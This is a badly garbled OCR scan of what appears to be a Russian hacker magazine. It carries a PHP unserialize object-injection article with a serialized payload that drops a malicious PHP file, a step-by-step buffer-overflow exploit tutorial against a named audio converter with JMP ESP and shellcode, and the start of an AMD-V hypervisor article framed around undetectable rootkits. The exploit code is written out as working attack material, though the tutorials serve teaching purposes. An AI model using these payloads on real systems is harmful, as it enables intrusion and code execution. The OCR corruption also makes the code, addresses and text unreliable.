лдііпй іМі*ГѴЯ(ІВМ ^іЛЧФГгііІІіІЙИ «1 РНР ІП0 }»Ч і« Ч Лій (в ІмКваяі 

розі Ехр!оіІлСіпп Ілскі аз ргангЛай И Зузсап аПй ЫаскНаг(. 

|ъ» ГН № Ѵеоі»! ІНЬгЛ4Л 4ПЙ йОѴЛбѴМРЬаГ. 



<?рЬр 



ТипсСіоп із_зегіа 1 І 2 ес 1 ( $сіаЦа ) 

{ 

// ІТ ІС ізп'С а зСгіпд, ІС 
ізп'С зегіа 1 І 2 есі 

ІТ ( !із_зСгіпд( $<ТаСа ) ) 

геСигп Таізе; 

$(ТаСа = Цгіт( $<ТаСа ) ; 

ІТ ( 1 N 7 ' == $сіаЦа ) 

геСигп Сгие; 

ІТ ( ! ргед_таСс]т ( 

' / л ( [асЮЬіз] ) : / ' , $с1аЦа, 
$Ьасііопз ) ) 

геСигп Таізе; 
з^іСсіт ( $Ьасііопз[1] ) 

{ 

сазе 'а' : 

сазе 'О' : 

сазе ' з ' : 

ІТ ( ргед_шаСс]т( 

" / А { $Ьасііопз [1] } : [0- 
9 ] + : .*[;}] \$/з" , $(ТаСа ) ) 

геСигп Сгие; 

Ьгеак; 
сазе ' Ь 1 : 

сазе * і * : 

сазе ' сМ : 

ІТ ( ргед_шаСс]т( 

" / А { $Ьасііопз [ 1 ] } : [ 0-9 . Е- ] + ; \$ / " , 
$(іаСа ) ) 

геСигп Сгие; 

Ьгеак; 

} 

гекигп Таізе; 

} 



Типскіоп тауЬе_ипзегіа1І2е 
( $огідіпа1 ) 

{ 

ІТ (із_зегіа 1 І 2 еЬ ( $огідіпа1) ) 
// Ьоп'к аСкешрк ко ипзегіаііге 



і 




ОСКІЫб ЫЕѴѴ5 ІЫ РНР 
ХРЮІТАТІОЫ» 
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Риіііпд і* аІІ ІодеіНег... 




0:8: \'7епй_1_од\" : 1 : {5 : 11 : \"\0*\0лгі*ег5\" ; а : 1 : {г : 0 ; 0 : 

20 : \ 1 " 2епй_ЮдЛ»г и ег_Маі1 V : 5 : {з : 16 : \ п \0*\0_еѵепі: зТоМа и V ; а : 1 : {і : 0 ; і : 1 ; }з : 

гггѴХѲ^ЩвуоибЕѵеМгзТоМаиѴ^а^Оз^Ѵ^ЧО^иЧ^О^Л^епа^ІѴ: 

0:{}5:10:\"\0*\0_1ауоиб\’ , ;О:11:\ , 7ела_1ауоиб\":3:{з:13:\' , \0*\0_1пПеаог 

\";О:23:\7епа_Ріиег_РгедКер1асеѴ , :2:{з:16:\"\0 , ‘\0_іж]і:сЬРа^егп\";з:7:\'7 

С.*Уе\ ,, ;5:15:\ ,, \0*\0_гер1асетепі:Ѵ , ;5:15:Ѵ'рГіріпРоС).аіеО\ п ;}5:20:Ѵ'\0'* 

\0_іпЯес-ьогЕлаЫеа\";Ь:1;з:10:\"\0*\0_1ауоиЕ\";з:6:\"1оуоиі:\";}з:22:\ П \0* 

\0_зиЬ]ес-і:РгерепаТех*\" ;М;}}} 

ПРЕЗЕНТАЦИЯ СТЕФАНА ЭССЕРА 



баба Штаб ѵѵазп'б зегіаіігеб доіпд 
іп 

гебигп ©ипзегіаіі^е ( 

$огідіпа1 ) ; 

гебигп $огідіпа1; 

} 

?> 

Здесь видно, что, будучи примененной к 
какой-либо строке, при определенных усло- 
виях функция тауЬе_ип5егіаІІ2е(] может про- 
пустить оную через нужную нам ипзегіаіігеі). 
Рассмотрим подробнее наш класс {езЮІазз в 
контексте сериализации: 

1. Переменная $1од_б1е является защищен- 
ной, следовательно, при сериализации она 
должна выглядеть как «\0*\01од_ГіІе»; 

2. Переменная $раіЬ является закры- 
той и при сериализации выглядит как 
«\0іе5ЮІазз\0раіЬ» (префикс — имя класса); 

3. Последняя переменная $1од_битр являет- 
ся открытой всюду и для всех, так что ника- 
ких специальных манипуляций с ней прово- 
дить не нужно. 

Из данных утверждений вытекает возможный 

ЭКСПЛОЙТ: 

<?рЬр 

//$ро1е — может быть извлеченным 



из БД полем 

$ро1е = " О : 9 : \ " безбСІазз \ " : 3 : { з : 11 
: \ " \0*\01од_бі1е\ " ; з : 9 : \ " еѵіі .р1ір\ 
0\ " ; з : 15 : \ " \0безбС1азз\0рабЪ.\ " ; з : 2 
: \ " . / \ " ; з : 8 : \ " 1од_битр\ " ; з : 1 6 : \ " < ? 
рЪріпбо ( ) ; ?>\ " ; } " 

$ро1е = шауЬе_ипзегіа1І2е ( $роіе) ; 
?> 

В примере наш объект вызывается с пред- 
установленными переменными $Іод_ГіІе = 
"еѵі1.рЬр\0"; (нулл-байт нужен для обрезания 
предустановленного в классе расширения 
.М) и $Ьд_битр = "<? рЬріпбоО ; После 

десериализации, а следовательно, и уни- 
чтожения объекта в директории с логами 
должен появиться файл еѵіІ.рЬр, содержащий 
наш злонамеренный код :]. 

В случае с ѵѵакеир вся эксплуатация 

выглядит совершенно таким же образом 
(потому что этот метод также вызывается при 

десериализации), а вот в случае с ІоЗігі пд 

уязвимый код в СМ5 должен выглядеть чуть- 
чуть иначе: 

<?р]тр 

ргіпб ипзегіаііге ( $ро1е) ; 

?> 



Здесь десериализованная строка должна 
сразу же выводиться на экран с помощью 
ргі пі или есбо, — тогда и только тогда будет 
вызван указанный метод. 

Для более глубокого понимания описан- 
ного класса уязвимостей советую вни- 
мательно изучить презентации Стефана 
Эссера (ссылки, как всегда, ищи в сно- 
сках). В них содержатся реальные при- 
меры использования метода безігисі; 

в Іепд Ргатеѵѵогк с выполнением кода 
через ргед_гер1асе, инклудом удаленных 
файлов, загрузкой и удалением произ- 
вольных файлов и т.д. 

МЕМЕІШ 

Описанное выше является лишь доку- 
ментированными возможностями нашего 
любимого РНР, просто существуют спе- 
циалисты, которые изучают эти возможно- 
сти немного глубже, чем обычные кодеры 
:). Так что, рекомендую с огромной осто- 
рожностью применять в своих проектах 

магические методы ѵѵакеир, ІюЗітіпд 

и сіезітисі: вкупе с десериализацией 

любого пользовательского ввода (вообще 
никогда не стоит доверять пользова- 
телям). Я же с нетерпением буду ждать 
новых исследований от Стефана Эссера, 
чего и тебе советую! т 
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эксплоит 

«НА. КОЛЕНКЕ» ПИШЕМ 

ЭКСПЛОЙТ ПОДРУЧНЫМИ СРЕДСТВАМИ 

РАНО ИЛИ ПОЗДНО МНОГИМ ИЗ НАС ПРИХОДИТСЯ СТАЛКИВАТЬСЯ 
С ЗАДАЧЕЙ НАПИСАНИЯ ЗКСПЛОИТА. ТЕОРЕТИЧЕСКИХ ИЗЫСКАНИЙ НА 
ЭТУ ТЕМУ ПРОВЕДЕНО МНОЖЕСТВО. НО ПРАКТИЧЕСКИХ И ПОНЯТНЫХ 
ПРИМЕРОВ ДО СИХ ПОР НЕ ТАК МНОГО. ПОЭТОМУ СЕГОДНЯ НАШЕЙ 
ЗАДАЧЕЙ БУДЕТ НАПИСАНИЕ РАБОТАЮЩЕГО ЭКСПЛОИТА ДЛЯ КОНКРЕТНОЙ 
ПРОГРАММЫ. МЫ РАЗБЕРЕМ ВСЕ ТОНКОСТИ И ПОПЫТАЕМСЯ ПОНЯТЬ. 

КАК ИМЕННО НАХОДЯТ УЯЗВИМОСТИ И УСПЕШНО ИМИ ПОЛЬЗУЮТСЯ. 
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П режде, чем мы перейдем к практике, напомню несколько 

очень важных моментов. Эксплоит — это программа, которая 
написана для использования конкретной уязвимости в 
компоненте операционной системы или приложения. Чаще 
всего используются дыры, которые связаны с переполнением 
буфера. Думаю, нетсмысла слишком подробно освещать данную тему — 
в Сети можно найти бездну сугубо теоретического материала. Впрочем, 
основные понятия ты все-таки сможешьусвоить в процессе чтения 
статьи. Приступим к исследованию. 



ПЕРВЫЕ ШАГИ К НАПИСАНИЮ 
ЭКСПЛОИТА 

«Лабораторным кроликом» для наших экспериментов послужит ути- 
лита «ЕНЕЕ ѴѴМА МРЗ сопѵеНег», уязвимости которой мы постараемся 
найти. Конвертер, который мы будем рассматривать, имеет небольшой 
размер. Это и послужило одной из причин, почему я решил описать 
именно его исследование (разбирать мегабайты кода — дело чрез- 
вычайно сложное]. Открой программу и задай при помощи кнопки 
«ЭеШпдз» папку для сохранения декодированных файлов. Обрати 
внимание: программа умеет конвертировать ѴѴАѴ в МРЗ и другие фор- 
маты. 

Открой шестнадцатеричный редактор «ѴѴіпНех» и создай файл разме- 
ром 5192 байт. Заполни его целиком последовательностью одинаковых 
символов (например, «А»), после чего сохрани с расширением «.ѵѵаѵ». 
Попробуй перекодировать его в трЗ-файл при помощи нашего кон- 
вертера. Программа завершит работу без всяких предупреждений! Это 
достаточно любопытно. Чтобы узнать, с чем связано такое поведение 
нашего «пациента», загрузим его в ОІІуОЬд и попробуем отладить. После 
того, как программа запустится под отладчиком, снова прикажи ей пере- 
кодировать созданный ѵѵаѵ-файл в файл формата трЗ (в случае, если 
возникнет исключение «Ассезз Ѵіоіабоп ѵѵбеп ѵѵгібпд Го [00000000]», 
игнорируй его путем многократного нажатия <5ЫІі+Е9>). Итак, перед 
нами исключение: Ассезз ѵіоіабоп ѵѵбеп ехесиГіпд [41414141]. Этот адрес 
выглядит весьма странно, не так ли? Дело в том, что функция, которая 
прочитала последовательность символов вида «ААА...» из файла, что 
мы ей скормили, поместила ее в стек — целиком, безо всякой проверки 
длины. Видимо, в результате этих действий адрес возврата из функции 
обратно в программу был заменен символами «АААА», шестнадца- 
теричный код данной последовательности выглядит как 0x41414141 . 
Неудивительно, что программа решила обратиться поданному адресу. 
Но, если возможно переписать адрес возврата из функции путем поме- 
щения в ѴѴАѴ-файл неимоверно длинной строки символов, существует 
ли возможность записать вместо случайных чисел конкретный адрес? 
Да. Взгляни на текущее значение регистра Е5Р — оно указывает на 
вершину стека и равно 19ЕЕЕЕ8 (впрочем, все зависит от билда ОС]. 



Прокрути окно стека чуть выше — наткнешься на первую последова- 
тельность байт вида «41414141», которая была помещена в стек. Она 
располагается по адресу 19ЕЕЕ04. Если вычесть это значение из числа, 
содержащегося в регистре Е5Р, мы получим шестнадцатеричное 1014, 
которое равно десятичному значению 4116. Это — количество данных, 
которое гарантированно затирает адрес возврата из функции в стеке. 
Следовательно, если мы поместим в наш ѴѴАѴ-файл последовательность 
из 41 12 символов, а последние 4 символа заменим адресом возврата, 
программа передаст управление именно на него. 

Проверим эту догадку: в ѴѴіпНех открывай наш файл и меняй четыре 
байта, начиная со смещения 0x1010 (десятичное 4112], на любые другие. 
Сохраняй файл и скармливай его нашему конвертеру. Все совпадает — 
программа пытается обратиться по недопустимому адресу, записанному 
нами (между прочим, адрес необходимо записывать в файл «задом 
наперед», то есть, начиная с последнего байта]. Но как это может при- 
годиться? Представь себе, что следом за адресом возврата в стек мы 
поместим написанный нами вредоносный код (так называемый «шелл- 
код»]. Чтобы он был исполнен, необходимо лишь сделать так, чтобы 
адрес возврата указывал на инструкцию, которая осуществляет безуслов- 
ный переход к выполнению кода, записанного в стек (например, такой 
инструкцией может быть са[[ езр или ]тр езр]. Можно пойти по наиболее 
простому пути: разыскать в недрах любого из модулей подобную инструк- 
цию и заменить адрес возврата в ѴѴАѴ-файле ее адресом. Стоит, однако, 
учитывать два условия. Первое — нельзя искать инструкцию в модулях, 
которые загружены в память по адресу, содержащему нулевые байты. 
Ноль — символ окончания строки, если мы запишем его в код эксплои- 
та, функция просто «обрубит» все, что располагается после него. Таким 
образом, инструкция с адресом «12345678» нам подходит, а вот переход 
или вызов, расположенный по адресу «00777777» не подойдет, ибо он 
содержит нулевой байт. Второй момент, на который следует обратить 
внимание — старайся искать инструкцию перехода на стек внутри моду- 
лей, которые входят в сборку программы. Ведь разные билды операци- 
онных систем содержат разные системные библиотеки. 

Я выбрал следующую инструкцию (модуль « I ЕРРАМ Е.сІ [[») : 

402 9с1с93 ЦМР ЕЗР 

Помни, что, если ты не нашел похожей инструкции, это не повод для 
отчаяния. Если в памяти программы существует секция данных, содер- 
жащая опкод инструкции и имеющая атрибуты исполнения, ты можешь 
передать управление на соответствующий байт данных. Неважно, будет 
ли он частью числового значения или строки. Плавное — ты сможешь 
передать управление коду. Вписывай в ѴѴАѴ-файл по смещению 41 12 
адрес возврата. Мой настоятельный совет — следующие два байта в 
файле, которые располагаются сразу за адресом возврата, обнули. Это 
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В ПРОЦЕССЕ ОТЛАДКИ ШЕЛЛ-КОДА. 



Теперь мы можем писать зЬеІІ-код! ОІІуОЬд 
поможет нам — мы будем набирать шелл-код 
прямо в окне кода отладчика. 

РАЗРЕШИТЕ ПРЕДСТАВИТЬСЯ. 
5НЕИ-К0Д 

Итак, условимся, что первые четыре байта 
нашего кода будут ІЧОР-ами. По адресу 
0210РЕЕС расположим набор инструк- 



0210РЕЕ8 0000 

ВУТЕ РТЕ БЗ: [ЕАХ] ,АЬ 



даст возможность остановиться на исклю- 
чении при дальнейшей отладке файла, не 
улетая в «дебри». Сохраняй результат и снова 
запускай декодер под отладчиком. На этот раз 
все прошло как нельзя лучше — произошла 
остановка на исключении: 



ций, которые будут выполнять опреде- 
ленные действия. Какие? Скажем, вызов 
МеззадеВохА (разумеется, вместо вполне 
безобидных действий «жучок», живущий 
внутри ѴѴАѴ-файла, может и загружать 
троян, и уничтожать важные данные]. 
Приступим к написанию кода. Необходимо 
использовать, как минимум, две функции: 
МеззадеВохА и ЕхііРгосезз (о корректном 
завершении программы можно и не забо- 
титься, но мы все-таки сделаем это]. 

Нажми на кнопку «Р» управляющей панели 
отладчика. Ты увидишь список всех вызо- 
вов, эксплуатируемых программой. Нам 
нужны только две АРІ-функции, упомянутые 
выше. Если никаких функций в списке ты 
не видишь, выбери модуль ѵѵтрсоп.ехе в 
списке «ЕхесіЛаЫе тосіиіез» и повтори 
действие еще раз. Итак, ищи в списке стро- 
ку «САІ_І_<ЗМР.&изег32.Ме55адеВохА>». О 
чем нам говорит запись подобного вида? 
Разумеется, о том, что вызов функции 
не является прямым. Следует получить 
конструкцию непосредственного вызова, 
чтобы шелл-код работал во всех ситуациях. 
Дважды щелкни по строке, чтобы перейти 
на инструкцию вызова в окне дампа. В окне 
дампа также дважды щелкни по инструкции 
вызова. Откроется окно редактирования 
кода, содержащее следующую инструкцию: 
САН 00401310. Этот адрес нас и интере- 
сует. Копируем его, нажимаем <с1тІ+д>, 
вставляем в окошко скопированный адрес 
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и нажимаем «Ок». Мы переместились к 
инструкции вида: 

БМР БѴГОКБ РТК БЗ: [4СС254] 

Это — непосредственный вызов функции 
МеззадеВохА. Запомним его. Теперь прокрути 
дамп окна кода чуть выше и увидишь анало- 
гичный «переходник» для функции ЕхТРгосезз: 

БМР БѴГОКБ РТК БЗ: [4СС228] 

Последний момент: нам необходимо где- 
то хранить параметры, передаваемые 
МеззадеВохА. Поместим их сразу же за 
нашим кодом. Адрес в моем случае полу- 
чился равным 210РР0В. Надо выделить 
набор байт, начинающихся с этого адреса, 
и нажать комбинацию клавиш < сРгІ+е > . 
Откроется окно редактирования, в котором 
нужно ввести текст с завершающим (нуле- 
вым] байтом-терминатором. Для простоты 
будем использовать один и тот же текст и 
для заголовка выдаваемого МеззадеВох-а, 
и для его тела. Поскольку статичный адрес 
параметров узнать нельзя (вершина стека 
динамично изменяется], всегда нужно 
будет высчитывать положение параметров. 
Сделать это просто: один раз ввести в окне 
кода ОНуОЬд текстовую строку параметра, 
после чего высчитать разность между зна- 
чением регистра Е5Р и ее положением. В 
моем случае значение разности оказалось 
равным 0x27. Таким образом, чтобы полу- 
чить доступ к параметру, обратись по адре- 
су Е5Р+27. Как видишь, все просто. 

Да, необходимо помнить и о том, что мы 
должны возвратиться обратно в стек, 
чтобы завершить программу корректно. 
Для этого нужно еще до выполнения 
вызова МеззадеВохА поместить в стек 



адрес инструкции, следующей за опера- 
цией перехода к АРІ-функции. К сожа- 
лению, и здесь придется обращаться 
к арифметике относительных адресов: 
инструкция, следующая за вызовом, 
имеет адрес [езр+2Ь]. 

Итак, мы получили все, что требовалось. 
Осталось лишь написать «шелл-код» 
(разумеется, это весьма безобидный набор 
инструкций): 

019ЕЕЕЕ8 90 ЮР 

019ЕЕЕЕ9 90 ЮР 

019ЕЕЕЕА 90 БОР 

019ЕЕЕЕВ 90 БОР 

; параметры для МеззадеВохА: 

019ЕЕЕЕС РБЗН 0 

; стиль окна 

; высчитываем положение параметров 
функции МеззадеВохА внутри стека 
019ЕЕЕЕЕ МОѴ ЕАХ,ЕЗР 

; помещаем в ЕАХ значение стека 
019ЕЕЕЕ0 АБВ ЕАХ, 27 

; увеличиваем значение регистра 
на 27 байт и получаем адрес пара- 
метра 

019ЕЕЕЕЗ РБЗН ЕАХ 

; кладем в стек заголовок окна 
019ЕЕЕЕ4 РБЗН ЕАХ 

; кладем в стек тело окна 
019ЕЕЕР5 РБЗН 0 

; никакого владельца у окна не 
будет — помещаем в стек ББББ 

; считаем значение адреса воз- 
врата из МеззадеВохА: 

019ЕЕЕР7 МОѴ ЕАХ,ЕЗР 



; помещаем адрес возврата в стек 
019РРЕРБ БМР БѴГОКБ РТК 
БЗ : [<&изег32 . МеззадеВохА>] 

; Вызываем МеззадеВохА 
019ЕЕЕ03 РБЗН 0 

; код завершения процесса — ноль 

019ЕЕР05 БМР БѴГОКБ РТК 

БЗ : [<&кегпе132 . ЕхібРгосезз> 

; выходим из программы 

; начиная с адреса 019ЕЕР0В, рас- 
полагаются байты размещенных нами 
данных 

После того, как ты введешь код под отладчи- 
ком целиком (включая строковой параметр 
для МеззадеВохА], выделяй его и выбирай 
из контекстного меню пункт «Віпагу -> Віпагу 
сору». В буфере обмена окажется машинный 
код, который необходимо вставить в ѴѴАѴ- 
файл сразу после адреса возврата (начиная 
со смещения 0x1014]. 

Код выглядит следующим образом: 
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Код не совпадает с форматом данных, 
который использует утилита ѴѴіпНех. Чтобы 
ѴѴіпНех принял данную последователь- 
ность, удали из нее все пробелы. После 
этого открой ѴѴіпНех, перейди в Іпзегі: 

Мобе («Режим вставки данных»], нажав 
клавишу ІпзегР Подведи курсор к смеще- 
нию 0x1014, выбери из контекстного меню 
правой кнопки мыши «Ебб->СІірЬоагб 
Оаіа-^РазІю», согласись на увеличение 
размера файла нажатием на кнопку «Ок» в 
появившемся окне. Появится окно выбора 
формата вставляемых данных. Нам нужен 
пункт «А5СІІ Нех». Выделяй его, нажимай 
«Ок». Готово! Сохраняй полученный файл и 
пробуй «скормить» его конвертеру файлов. 
Если все сделано правильно, появится 
окно сообщения, свидетельствующее о 
том, что шелл-код выполняется. 

И НАПОСЛЕДОК... 

Если ты хочешь стать хорошим спе- 
циалистом в области исследования 
уязвимостей программного обеспе- 
чения, не используй готовые экс- 
плоиты! Ищи информацию на лентах 
уязвимостей, используй свои знания 
и вспомогательные инструменты для 
создания собственных вариантов кода. 
Это поможет тебе научиться и обхо- 
дить системы защиты, и создавать их. 
Успешных взломов, но не забывай о 
законе! т 
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АППАРАТНАЯ 



ТЫ. КОНЕЧНО, НЕ РАЗ СЛЫШАЛ ПРО ТАКУЮ ШТУКУ. КАК АППАРАТНАЯ 
ВИРТУАЛИЗАЦИЯ - ТЕХНОЛОГИЮ. ПОЗВОЛЯЮЩУЮ ЗАПУСКАТЬ 
НЕСКОЛЬКО ГОСТЕВЫХ ОС НА ОДНОЙ МАШИНЕ (ТАК НАЗЫВАЕМОМ ХОСТЕ). 
ИСТОРИЧЕСКИ ПЕРВОЙ БЫЛА ПРОГРАММНАЯ ВИРТУАЛИЗАЦИЯ. ЗАТЕМ 
РАЗРАБОТЧИКИ ПРОЦЕССОРОВ ПРИЗАДУМАЛИСЬ. ЧТО НЕПЛОХО БЫЛО БЫ 
ОБЕСПЕЧИТЬ АППАРАТНУЮ ПОДДЕРЖКУ ЭТОГО ДЕЛА. ИТАК. С 2006-Г0 ГОДА 
В НАШЕМ РАСПОРЯЖЕНИИ ОКАЗАЛИСЬ ПРОЦЕССОРЫ ШЕІ. И АМО 
С ВОЗМОЖНОСТЯМИ ВИРТУАЛИЗАЦИИ. И ПОШЛО-ПОЕХАЛО... 



Н адо сказать, что обзоров и статей, 
касающихся темы виртуализации, 
выходило за эти годы немало. На- 
пример, рекомендую к прочтению 
статью «Технологии аппаратной 
виртуализации», представляющую собой до- 
вольно основательный обзор сабжа: 
іхЬТсот/ст/ѵігІиаЦгаІіоп-б.зЫтІ . 

Однако, ни одной статьи, выходящей за 
рамки аналитики, я так и не встретил. Пора 
закрыть этот пробел и сконцентрироваться, 
наконец, на деталях реализации гиперви- 
зора. Между тем, уже, наверное, каждому 
известно про «Голубую пилюлю» (Віие Рі II) 
Рутковской, в которой возможности виртуа- 
лизации успешно применяются, причем не 
в самых легитимных целях :]. Пока кто-то 



создает экспериментальные руткиты на базе 
виртуализации, кто-то активно разрабатывает 
анти-руткиты. Так, НурегзідЫ: Рооікіі Оеіесіог 
от ІМоііЬ Зесигку І_аЬз — считай, готовый 
анти-руткит для ѴѴіпсІоѵѵз. Для І_іпих тоже 
существует подобный проект — НоокЗабе, 
который был представлен на конференции 
АСМ по компьютерной и сетевой безопасно- 
сти (СС5 2009). 

Такой интерес к виртуализации далеко не 
случаен — ведь для хакера это уникальная 
возможность скрытия своего присутствия 
в системе (наряду с более сложными, но 
и не менее красивыми атаками на 5ММ и 
АМТ). Конечно, чтобы сделать руткит (даже 
на базе виртуализации) на 100% недетекти- 
руемым, придется напрячься, но игра стоит 



свеч! В конце концов, мы получает возмож- 
ность тотального контроля над системой. 
Заинтересовало? Тогда вперед, осваивать 
такую непростую штуку как программирова- 
ние гипервизоров. 

Прежде чем зарываться в документацию, 
нужно обрисовать задачу более подроб- 
но. Вообще, аппаратная виртуализация 
в процессорах I піеі (именуемая I піеі ѴТ) 
отличается от аналогичной у АМО (АМО-Ѵ). 
Отличается — значит, код гипервизора (ака 
ѴММ — Ѵігѣиаі МасЫпе МопТог) для АМО не 
будет работать на платформе I піеі. Поэтому 
мы начнем с АМО и продолжим о I пііеі в 
последующих статьях. Чтобы ты мог уточнить 
для себя какие-то вещи, тебе потребуется 
дока от амд (смотри врезку), также можно 
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почитать краткий обзор АМИ-Ѵ от производителя [ атб64. 
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М5Р-РЕГИСТР ЕРЕК.У НЕГО ПОЛНО РАЗ- 
ЛИЧНЫХФУНКЦИЙ ПОМИМО ВКЛЮЧЕНИЯ 
АППАРАТНОЙ ВИРТУАЛИЗАЦИИ 



как и, в общем-то, весь код нашего гипервизора, будет 
находиться в драйвере и работать в гіпд-0. В процессе 
освоения кодинга гипервизора от тебя потребуется пред- 
ставление о программировании драйверов под ѴѴіпсІоѵѵз, 
знание с/с++ и 64-битного ассемблера на базовом уровне. 
Хотя я все равно постараюсь объяснить все максимально 
подробно. 



ТЕОРЕТИЧЕСКИЕ ОСНОВЫ перед тем, как приступать к 

написанию кода, необходимо получить минимальную тео- 
ретическую базу. Для начала определимся с терминами и 
аббревиатурами, которые будут использоваться далее по 
тексту. 

Гостевой режим — по аналогии с защищенным, реаль- 
ным — режим работы процессора, в котором выполняется 
гостевая система. 

Гость — виртуальная ОС, работающая в гостевом режиме 
под управлением гипервизора 

ѴММ (монитор виртуальных машин, гипервизор) — про- 
граммное обеспечение, перехватывающее события в 
госте. Гипервизор представляет собой рычаг управления 
гостевыми системами. 

Хост ( по отношению к гостю) — система, на которой запу- 
щен гипервизор. 

#ѴМЕХІТ — переход из режима гостя в режим хоста. 

ПОДРОБНОСТИ Ты — обладатель процессора АМО. Как 
узнать, есть ли в нем поддержка аппаратной виртуализации? 
О том, что мы имеем соответствующий функционал, рапорту- 
ет функция 80000001 Ь инструкции СРОЮ (второй бит от нуля 
в регистре есх, именуемый 5ѴМ, должен быть установлен). 
Функция, возвращающая 0 или І.если возможности виртуа- 
лизации недоступны или доступны, соответственно: 

ІзЗѴМАѵаіІаЫеРгос ргос 
хог гах , гах 
тоѵ еах, 80000001Ы 
сриісі 

хог гах , гах 

ЪР есх, 2 ; проверяем бит 8ѴМ 

2 )пс іР_ 2 его ; прыгаем, если бит равен О 

іпс гах 

іР_гего : 

геР 

ІзЗѴМАѵаіІаЫеРгос епбр 

Убедившись, что в нашем распоряжении подходящий 
процессор, можно приступать к дальнейшему описанию. 
Забегая вперед, скажу, что включение виртуализации, 



ИНСТРУКЦИИ УПРАВЛЕНИЯ ВИРТУАЛЬНЫМИ 

МАШИНАМИ По своей сути аппаратная виртуализация — 
это расширение архитектуры ЦП: набор инструкций + 
новый режим работы процессора. До того, как говорить 
о наборе команд, нужно разобраться с такой штукой, как 
ѴМСВ. ѴМСВ (Ѵігіиаі МасЫпе Сопігоі Віоск) — управляю- 
щий блок виртуальной машины. Это основная структура 
данных, с которой нам предстоит работать. ѴМСВ описы- 
вает виртуальную машину, которую мы будем запускать. 
Сразу о технических деталях: ѴМСВ занимает одну стра- 
ницу (4 килобайта) в непрерывной физической памяти. 
ѴМСВ состоит из 2-х частей — область флагов (сопігоі 
агеа) и область состояния (зіаіе-заѵе агеа). Рассмотрим 
структуру ѴМСВ подробнее. ѴММ, как уже упоминалось, 
перехватывает события, происходящие в госте. Какие 
это будут события — определяется в области флагов. Мы 
можем перехватывать: 

1. Чтение/запись контрольных регистров (сг0-сг1 5). 

Первые 16 бит структуры ѴМСВ как раз и отводятся на 
установку перехвата операции чтения для каждого из 
контрольных регистров. Каждый бит отвечает за свой 
контрольный регистр. Вторые 16 бит ѴМСВ отвечают за 
операцию записи в контрольные регистры. 

2 . Чтение/запись отладочных регистров (бгО-15). 

3. Инструкции гсітзг/ѵѵгтзг для выбранных тзг- 
регистров. Чтобы определить, какие тзг подлежат конт- 
ролю, используется так называемая МЭР Регтіззіоп Мар 
(в переводе — карта разрешения тзг, сокращенно — 
М5РРМ). На каждый тзг в ней отводится по 2 бита — для 
контроля операции чтения и записи. Физический адрес 
начала М5РРМ хранится в ѴМСВ. 

Когда будет произведена запись/чтение в контролируемый 
тзг — произойдет #ѴМ ЕХІТ, а подробная информация о 
событии запишется в поле ехіііпіюі ѴМСВ (оно будет равно 
0 — если выход спровоцировала гсітзг, и 1, если ѵѵгтзг). 

4 . Инструкции работы с портами. Как и в случае с тзг- 
регистрами, за контроль доступа к портам отвечает 
карта разрешения ввода-вывода (ІОРМ, 1/0 Регтіззіоп 
Мар). Там, конечно, все чуток сложнее, чем с тзг. После 
#ѴМ ЕХІТ информация об исключении запишется в поле 
ехіііпіоі , где будет содержаться информация об инструк- 
ции, которая вызвала исключение. 




> Ііпкз 

• АМ064 АгсЫіеФиге 
Ргодгаттег'з 
Мапиаі Ѵоіите 2: 
Зузіет Ргодгаттіпд: 
атсі.сот/из-еп/ 
аззеіз/сопіепі Іѵре/ 
ѵѵЫіе рарегз апб 
Іесб босз/24593-рсІГ 
Теме виртуализа- 
ции в этом Мануэле 
посвящена глава 

1 5, Эесиге Ѵігіиаі 
МасЫпе. 

• НурегзідЫ Рооікіі: 
Оеіесіог (для 

ѴѴі псіоѵѵз) — анти- 
руткит на основе 
аппаратной виртуа- 
лизации. Фраза на 
главной странице 
«Віие Рііі перестал 
быть невидимым» — 
заставляет позна- 
комиться с сабжем 
поближе: 
погіЬзесигіІуІаЬз. 
сот/ги . 

• Проект Віие Рііі 
Джоанны Рутковской 
— руткит, использую- 
щий аппаратную вир- 
туализацию (опен- 
сорс): Ыиеріііргоіесі. 
ого . 

• В качестве допол- 
нительной литерату- 
ры можно почитать 
также ман АМО, 
целиком и полностью 
посвященный СРІІЮ. 
СРШО Эресібсаііоп: 
атсі.сот/из-еп/ 
аззеіз/сопіепі іѵре/ 
ѵѵЫіе рарегз апсі 
іесб сіосз/25481 .рсИ . 

• Проект Хеп: 
хеп.огд/ргосіисіз/ 
ргоіесІз.ЫтІ . 

• НоокЗаіе — нетак 
давно появивший- 
ся анти-руткит на 
основе гипервизора 
(для І_іпих). Иссле- 
дователи работают 
над версией для 
ѴѴІПСІОѴѴЗ: 
ЫірТ/сІізсоѵе гѵ.сзс. 
псзи.есІи/риЬз/ссзО?- 
НоокЗаіе.рсІІ . 
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ФОРМАТ ПОЛЯ ЕХІТШРОі В ѴМСВ 
ДЛЯ ПЕРЕХВАЧЕННЫХ ИНСТРУК- 
ЦИЙ ВВОДА-ВЫВОДА 

5 . Инструкции чтения/записи регистров 
ІсКг.дсЙг, Іг.ісЙг. 

6 . Исключения (0-31 векторы в ЮТ). 

7 . Инструкции, отвечающие за 
аппаратную виртуализацию 
(ѴМРІЛ\І,ѴМ5АѴЕ,ѴМЕ0А0...). То есть, можно 
контролировать запуск других гиперви- 
зоров (они будут вложенными). Кстати, 

с помощью перехвата этих инструкций 
НурегзідЫ: Рооік И; Ое1:ес1:ог и обнаруживает 
«Голубую пилюлю». 

8 . Сигналы 5МІ, ЫМІ, ІМІТ ... 

9 . Еще много различных инструкций, таких 
как сриіб, ігеі, гзт и т.п. 

Все вышеперечисленные события — это 
условия #ѴМЕХІТ — возвращения из госте- 
вого режима в режим хоста. Каждая причина 
#ѴМ ЕХІТ имеет свой код, который записыва- 
ется в поле ехТсобе области флагов ѴМСВ. 

Вот некоторые из этих кодов: 

62 Ъ. — физическое 8МІ 

6ЕЪ. — произошла инструкция ВМТ8С 

7 01т — команда РІІЗНР 

711т - РОРР 

721т - СРІЛБ 

7Р — гость выключился ( 8Ъ.иббоѵт) 

801т — ѴМКШ 

811т — ѴММСАЬР 

821т - ѴМЬОАБ 

831т - ѴМЗАѴР 

881т — ІСРВР (инструкция с опкодом 
ОхРІ ) 

-1 — неверная ѴМСВ 

Полную таблицу #ѴМЕХІТ-тов можно посмот- 
реть в Аррепбіх С. 5ѴМ I піегсері; Ехіі Собез в 
уже упоминаемом мной АМ064 АгсЫіесШге 
Ргодгатппег'з Мапиаі Ѵоіите 2. 

Часть дефиниции структуры ѴМСВ (из сорцов 
Хеп): 

збгисб ѵтпсЪ_збгисб 

{ 

// область флагов 

// первое слово — перехват чтения 
сгО-15 

